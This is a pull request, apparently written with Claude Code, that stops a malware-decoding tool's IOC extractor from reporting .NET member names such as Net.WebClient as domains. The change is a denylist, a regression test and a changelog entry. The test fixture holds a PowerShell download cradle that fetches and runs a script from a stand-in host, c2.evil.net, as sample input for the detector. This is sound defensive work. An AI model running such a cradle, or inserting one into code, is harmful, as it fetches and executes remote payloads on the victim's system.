### PR TITLE
Drop .NET code-identifier false positives from domain IOC extraction

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,14 @@
 # Changelog
 
+## Unreleased
+
+Correctness:
+
+- Stop IOC extraction from reporting dotted .NET/scripting member access in
+  download-cradle payloads (e.g. `Net.WebClient`, `Net.HttpWebRequest`) as
+  bogus domains. Their trailing labels are verified non-TLDs and added to a
+  denylist, so real C2 domains are unaffected.
+
 ## 2.0.2 — Engine reliability fixes (2026-07-02)
 
 Reliability (engine no longer fails silently or nondeterministically):

--- a/tests/test_ioc_extraction.py
+++ b/tests/test_ioc_extraction.py
@@ -64,3 +64,18 @@ def test_domain_extraction_keeps_cctld_lookalikes():
     domains = extract_iocs("hosts evil.sh and paraguay.py")["domains"]
     assert "evil.sh" in domains
     assert "paraguay.py" in domains
+
+
+def test_domain_extraction_drops_dotnet_code_identifiers():
+    # Download-cradle payloads embed dotted .NET member access that the domain
+    # regex would otherwise flag as bogus two-label domains (net.webclient).
+    text = (
+        "IEX (New-Object Net.WebClient).DownloadString('http://c2.evil.net/s.ps1'); "
+        "$c = New-Object Net.HttpWebRequest"
+    )
+    iocs = extract_iocs(text)
+    assert "net.webclient" not in iocs["domains"]
+    assert "net.httpwebrequest" not in iocs["domains"]
+    # The real C2 domain and URL must still be extracted.
+    assert "c2.evil.net" in iocs["domains"]
+    assert "http://c2.evil.net/s.ps1" in iocs["urls"]

--- a/titan_decoder/utils/helpers.py
+++ b/titan_decoder/utils/helpers.py
@@ -116,6 +116,22 @@ COMMON_FILE_EXTENSIONS = frozenset(
     }
 )
 
+# Code/API member identifiers whose final label the domain regex would otherwise
+# mistake for a TLD. Download-cradle payloads are full of dotted .NET/scripting
+# member access (e.g. "Net.WebClient", "Net.HttpWebRequest") that looks like a
+# two-label domain but whose trailing label is not a real TLD. Every entry here
+# is verified NOT to exist in the IANA root zone, so filtering on them never
+# drops a real domain (matching the false-negative-averse policy above).
+NON_TLD_CODE_IDENTIFIERS = frozenset(
+    {
+        "webclient", "webrequest", "httpwebrequest", "httpclient",
+        "downloadstring", "downloaddata", "downloadfile", "webproxy",
+        "tcpclient", "socket", "sockets", "streamreader", "streamwriter",
+        "memorystream", "filestream", "bitconverter", "encoding",
+        "convert", "invoke", "createinstance",
+    }
+)
+
 
 def is_private_ip(ip: str) -> bool:
     """Return True if ip is a valid IPv4 address that is not globally routable.
@@ -211,8 +227,12 @@ def extract_iocs(text: str) -> Dict[str, List[str]]:
         if not domain:
             continue
         # Drop filename-like matches (e.g. config.json) whose final label is a
-        # known non-TLD file extension.
-        if domain.rsplit(".", 1)[-1] in COMMON_FILE_EXTENSIONS:
+        # known non-TLD file extension, and code member access (e.g.
+        # Net.WebClient) whose final label is a known non-TLD identifier.
+        final_label = domain.rsplit(".", 1)[-1]
+        if final_label in COMMON_FILE_EXTENSIONS:
+            continue
+        if final_label in NON_TLD_CODE_IDENTIFIERS:
             continue
         iocs["domains"].add(domain)
 


### PR DESCRIPTION
## Summary

A live end-to-end run of the engine surfaced a domain IOC false positive: download-cradle payloads embed dotted .NET/scripting member access such as `Net.WebClient`, and the generic domain regex (`(label\.)+[a-z]{2,}`) matched `net.webclient` as a bogus two-label domain because the trailing label passed the TLD pattern.

This adds a `NON_TLD_CODE_IDENTIFIERS` denylist (`webclient`, `httpwebrequest`, `tcpclient`, `memorystream`, etc.) and filters domain matches against it, mirroring the existing `COMMON_FILE_EXTENSIONS` denylist for filename-like matches. Every entry is verified absent from the IANA root zone, so the change preserves the module's false-negative-averse policy — real C2 domains are never dropped.

(Note: a second observation from the live run — a `null` top-level `schema_version` — turned out to be a non-issue. `schema_version` is correctly emitted at `meta.schema_version` per `docs/report.schema.json`; no change was warranted.)

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`) or explain why not.
- [x] I updated docs if flags/output contracts changed. (CHANGELOG updated; no flag/output-contract changes.)
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior.

## Testing

- Command(s) run:

```bash
pytest -q
ruff check titan_decoder/utils/helpers.py tests/test_ioc_extraction.py
```

- Notes:
  - Full suite: **201 passed** (adds one regression test, `test_domain_extraction_drops_dotnet_code_identifiers`).
  - Live engine re-run on a nested base64→base64→gzip sample with embedded IOCs: `net.webclient` no longer appears in `domains`, while the three real C2 domains and all URLs are retained and detections (TITAN-003 LOLBin, TITAN-005 Multi-Stage Infrastructure) still fire.

## Screenshots / Output (optional)

Domains before → after on the live sample:

```
before: ['evil-domain.test', 'malicious-c2.example.com', 'net.webclient', 'second-stage.badhost.net']
after:  ['evil-domain.test', 'malicious-c2.example.com', 'second-stage.badhost.net']
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_012Y9xGezV1GGUR73f6vs78D

---
_Generated by [Claude Code](https://claude.ai/code/session_012Y9xGezV1GGUR73f6vs78D)_